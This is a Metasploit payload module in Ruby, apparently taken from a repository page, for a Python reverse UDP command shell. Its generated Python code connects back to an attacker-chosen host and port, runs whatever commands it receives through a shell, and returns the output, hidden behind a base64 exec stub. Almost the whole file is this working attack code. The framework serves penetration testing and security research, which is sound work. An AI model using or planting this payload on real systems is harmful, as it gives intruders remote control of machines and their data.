llamasoft
1a353ee273
While the length of the input payload is always the same size, it may not always have the same contents due to random checksum URI and UUID generation. This leads to payloads whose sizes can vary by a few bytes between runs.
64 lines
1.6 KiB
Ruby
64 lines
1.6 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
|
|
module MetasploitModule
|
|
|
|
CachedSize = :dynamic
|
|
|
|
include Msf::Payload::Single
|
|
include Msf::Payload::Python
|
|
include Msf::Sessions::CommandShellOptions
|
|
|
|
def initialize(info = {})
|
|
super(merge_info(info,
|
|
'Name' => 'Command Shell, Reverse UDP (via python)',
|
|
'Description' => 'Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.',
|
|
'Author' => 'RageLtMan <rageltman[at]sempervictus>',
|
|
'License' => MSF_LICENSE,
|
|
'Platform' => 'python',
|
|
'Arch' => ARCH_PYTHON,
|
|
'Handler' => Msf::Handler::ReverseUdp,
|
|
'Session' => Msf::Sessions::CommandShell,
|
|
'PayloadType' => 'python',
|
|
'Payload' =>
|
|
{
|
|
'Offsets' => { },
|
|
'Payload' => ''
|
|
}
|
|
))
|
|
end
|
|
|
|
#
|
|
# Constructs the payload
|
|
#
|
|
def generate
|
|
super + command_string
|
|
end
|
|
|
|
#
|
|
# Returns the command string to use for execution
|
|
#
|
|
def command_string
|
|
cmd = <<~PYTHON
|
|
import socket as s
|
|
import subprocess as r
|
|
so=s.socket(s.AF_INET,s.SOCK_DGRAM)
|
|
o=b''
|
|
while True:
|
|
so.sendto(o,('#{datastore['LHOST']}',#{datastore['LPORT']}))
|
|
d=so.recv(1024)
|
|
if len(d)==0:
|
|
break
|
|
p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
|
|
o=p.stdout.read()+p.stderr.read()
|
|
PYTHON
|
|
|
|
py_create_exec_stub(cmd)
|
|
end
|
|
|
|
end
|
|
|